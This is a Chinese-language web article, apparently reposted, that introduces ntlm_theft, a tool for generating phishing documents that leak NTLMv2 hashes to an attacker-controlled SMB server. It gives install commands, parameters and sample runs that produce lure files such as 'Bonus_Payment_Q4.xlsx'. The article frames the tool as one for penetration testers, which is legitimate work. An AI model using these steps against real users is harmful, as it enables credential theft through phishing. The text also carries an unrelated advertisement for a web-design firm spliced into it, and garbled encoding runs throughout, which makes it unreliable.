關于ntlm_theft
ntlm_theft是一款基于Python 3開發(fā)的開源工具,可以生成21種不同類型的哈希竊取文檔����。該工具適用于網(wǎng)絡釣魚攻擊�,可以用于支持外網(wǎng)SMB流量和內(nèi)部網(wǎng)絡環(huán)境之中。與基于宏的文檔或利用漏洞的文檔相比�����,這些文件類型的好處在于���,所有的這些文件都是使用“預期功能”構(gòu)建的����。
創(chuàng)新互聯(lián)公司2013年成立��,是專業(yè)互聯(lián)網(wǎng)技術服務公司���,擁有項目成都網(wǎng)站制作��、網(wǎng)站設計網(wǎng)站策劃����,項目實施與項目整合能力�。我們以讓每一個夢想脫穎而出為使命,1280元西青做網(wǎng)站,已為上家服務,為西青各地企業(yè)和個人服務,聯(lián)系電話:18982081108
使用場景
ntlm_theft主要針對滲透測試人員和紅隊研究人員設計����,可以幫助研究人員對目標公司員工進行內(nèi)部網(wǎng)絡釣魚,或大規(guī)模測試防病毒和電子郵件網(wǎng)關的安全性���。如果外網(wǎng)防火墻上允許出站SMB訪問��,則它也可用于外部網(wǎng)絡釣魚���。
工具依賴
ntlm_theft基于Python 3開發(fā)�,因此我們需要在本地環(huán)境安裝并配置好Python 3環(huán)境��,并安裝好xlsxwriter:
- pip3 install xlsxwriter
工具下載
廣大研究人員可以使用下列命令將該項目源碼克隆至本地:
- git clone https://github.com/Greenwolf/ntlm_theft.git
工具參數(shù)
ntlm_theft的運行需要提供四個必要參數(shù)����,一個輸入格式,輸入文件或目錄�����,以及基礎的運行模式:
- -g, --generate : 選擇生成所有文件或指定文件類型
- -s, --server : SMB哈希捕捉服務器的IP地址
- -f, --filename : 不包含后綴的基礎文件名���,之后可以進行重命名
工具運行
下面給出的工具演示樣例中�,我們將使用ntlm_theft生成所有文件:
- # python3 ntlm_theft.py -g all -s 127.0.0.1 -f test
-
- Created: test/test.scf (BROWSE)
-
- Created: test/test-(url).url (BROWSE)
-
- Created: test/test-(icon).url (BROWSE)
-
- Created: test/test.rtf (OPEN)
-
- Created: test/test-(stylesheet).xml (OPEN)
-
- Created: test/test-(fulldocx).xml (OPEN)
-
- Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
-
- Created: test/test-(includepicture).docx (OPEN)
-
- Created: test/test-(remotetempl*ate).docx (OPEN)
-
- Created: test/test-(frameset).docx (OPEN)
-
- Created: test/test.m3u (OPEN IN WINDOWS MEDIA PL*AYER ONLY)
-
- Created: test/test.asx (OPEN)
-
- Created: test/test.jnlp (OPEN)
-
- Created: test/test.application (DOWNLOAD AND OPEN)
-
- Created: test/test.pdf (OPEN AND ALLOW)
-
- Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
-
- Generation Complete.
在下面的工具使用樣例中���,我們將使用ntlm_theft僅生成現(xiàn)代文件:
- # python3 ntlm_theft.py -g modern -s 127.0.0.1 -f meeting
-
- Skipping SCF as it does not work on modern Windows
-
- Created: meeting/meeting-(url).url (BROWSE TO FOLDER)
-
- Created: meeting/meeting-(icon).url (BROWSE TO FOLDER)
-
- Created: meeting/meeting.rtf (OPEN)
-
- Created: meeting/meeting-(stylesheet).xml (OPEN)
-
- Created: meeting/meeting-(fulldocx).xml (OPEN)
-
- Created: meeting/meeting.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
-
- Created: meeting/meeting-(includepicture).docx (OPEN)
-
- Created: meeting/meeting-(remotetempl*ate).docx (OPEN)
-
- Created: meeting/meeting-(frameset).docx (OPEN)
-
- Created: meeting/meeting-(externalcell).xlsx (OPEN)
-
- Created: meeting/meeting.m3u (OPEN IN WINDOWS MEDIA PL*AYER ONLY)
-
- Created: meeting/meeting.asx (OPEN)
-
- Created: meeting/meeting.jnlp (OPEN)
-
- Created: meeting/meeting.application (DOWNLOAD AND OPEN)
-
- Created: meeting/meeting.pdf (OPEN AND ALLOW)
-
- Skipping zoom as it does not work on the latest versions
-
- Skipping Autorun.inf as it does not work on modern Windows
-
- Skipping desktop.ini as it does not work on modern Windows
-
- Generation Complete.
在下面的工具使用樣例中�����,我們將使用ntlm_theft僅生成一份xlsx文件:
- # python3 ntlm_theft.py -g xlsx -s 192.168.1.103 -f Bonus_Payment_Q4
-
- Created: Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx (OPEN)
-
- Generation Complete.
工具運行截圖
項目地址
ntlm_theft:【GitHub傳送門】
文章名稱:如何使用ntlm_theft生成各種類型的NTLMv2哈希竊取文件
分享鏈接:
http://uogjgqi.cn/article/dpsiehp.html
